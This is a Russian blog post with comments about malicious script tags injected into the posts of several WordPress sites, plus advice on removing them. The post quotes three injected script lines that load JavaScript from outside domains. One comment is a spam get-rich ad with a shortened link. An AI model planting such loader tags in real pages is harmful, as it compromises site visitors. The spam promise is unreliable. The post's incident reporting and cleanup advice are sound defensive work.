×

Вредоносный код на сайтах Вордпресс

Сентябрь 29, 2015 8 комментариев

Всем привет. Началось все месяца 3 назад, лето, когда мои сайты еще лежали на хостингах. Решил подредактировать старые записи на одном из сайтов и заметил в коде вот такой скрипт (сразу несколько вариаций, на разных сайтах был разный код, немного подредактировал):

script src=//shareup.ru/social. js>script
script src=//css. googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2>script
script type=text/javascript src=//uptoliked.ru/widjets. js>script

Код оказался в каждой записи и на каждой страницы, вставлен рандомно в разные места.
Почистил все записи через замену в БД, сейчас вот узнал про плагин, который ищет и делает автозамену во всех записях и страницах, плагин — search regex. В общем, сменил тогда все пароли в админке, пароли к БД, обновил все движки и плагины, перенес сайты на ВПС. Причем тогда только на одном хостинге пострадали сайты, на втором было все нормально. Проделав все это, я успокоился, до сегодняшнего дня…

Сегодня вновь обнаружил эти коды, где-то на 7 из 10 сайтов, причем коды были вставлены даже на новых сайтах, где стоит только админка и нет никаких плагинов и эти сайты не лежали раньше на моем хосте! Т.е. версия, что коды идут через плагины, думаю, отпадает. Определенно как-то это все проникает через запросы к БД, но как? Ведь пароли стоят новые — генерированные. Написал в поддержку ВПС, там подтвердили факт наличия такой беды у меня, но помочь не смогли, сказали, что надо включать бинарный лог mysql, но это будет писаться каждый запрос к БД каждого сайта и эти логи будут гигабайтных размеров.

Мыслей как избавиться нет, да и не очень понятно что делают эти коды, что-то определенно они подгружают… А вот как они сами подгружаются? Люди добрые, подскажите как эта дрянь может проникать и как ее убить раз и навсегда?

Рубрика:WordPress
Комментарии
Doorwaymoney
DoorwaymoneyСентябрь 30, 2015 @ 00:23

Ну значит есть доступ к БД.
Скорее всего шелы залиты и через них «бомбят».
Скачай Ai-bolit, сделай полную проверку сайтов.

Если что-то найдешь — то вырубаешь все сайты и начинаешь — смена root на сервак, смена ftp на сервак и т.д.
Для каждого сайта:
— чистка файлов/бд от вирусни;
— смена пароля к БД;
— смена пароля к админу в WP;
… следующий сайт

Должно помочь, но если не поможет — значит есть какая-то дырка: плагины/настройки VPS и ХЗ что… Которую просто так не найдешь. Меняешь хостера и переносишь часть сайтов с чисткой.

Ну если и это не поможет — то снос плагинов.

Ответить
seoonly.ru
seoonly.ruСентябрь 30, 2015 @ 07:07

А сейчас какая версия WP стоит? Может с правами на папки с папкой с темой сайта проблемы?

644 попробовать выставить можно

Ответить
admin
adminСентябрь 30, 2015 @ 11:53

Ай-болит и антивирь от Яндекса ничего не находят, пароли к БД и прочему менял, версия ВП самая последняя. Тут дело в том, что давно взломали и код я не удалил, он походу в каком-то файле прописался системном, потом на новом впс заразил и другие сайты. Надо этот код в файлах искать. Парень один обещал помочь, говорит уже убивал эту херь…

Ответить
misecondi
misecondiСентябрь 30, 2015 @ 12:37

Сноси все, устанавливай на чистый двиг и подключай к старой бд. Пока пробуй на новую тему (можно дефолтную оставить), чтобы протестировать, потом можно свою вернуть (лучше, если есть из бекапа, пока сайт был чистым).
Хостер, кстати говоря, тут ни при чем, как выяснилось)), но это я так к слову пришлось…

Ответить
MoneyMakerClub.Net
MoneyMakerClub.NetСентябрь 30, 2015 @ 13:33

В последнее время активизировались подборы паролей. У меня прям сервак ложили подборщики. А если один раз подобрали, то залили куда нибудь шелл и теперь хоть меняй пароль, хоть нет без разницы. Скачай б/д сайта, скачай файлы загруженные и переустанови движок с нуля, потом восстанови б/д и внимательно просмотрев файлы залей назад. Ну пароли все поменять это само собой.

Ответить
asdf
asdfСентябрь 30, 2015 @ 13:59

Возможно в файлах тем есть что-то не хорошее.

Ответить
LarisaVew
LarisaVewОктябрь 3, 2015 @ 09:34

ПЕРВЫЙ И ПОКА ЧТО ЕДИНСТВЕННЫЙ В СТРАНАХ СНГ АВТОМАТИЧЕСКИЙ МЕХАНИЗМ КОТОРЫЙ ПРИНОСИТ 5 670 РУБЛЕЙ ЕЖЕДНЕВНО ВСЕГО ЗА ДВА ДЕЙСТВИЯ КОТОРЫЕ ЗАЙМУТ МАКСИМУМ 10 МИНУТ! http://bit.ly/1GpuH4C

Ответить
Александр
АлександрНоябрь 23, 2016 @ 08:37

Тоже столкнулся с такой проблемой, при переписке с хостером выяснилось следующее
«Как нам удалось выяснить, данные вставки кода были добавлены посредством уязвимости самой CMS WordPress, которая была устранена в версии 4.2.4.»
Соответственно что бы от этого избавиться нужно как минимум чистить БД от этого скрипта и менять пароли везде где можно.

Ответить
Оставить комментарий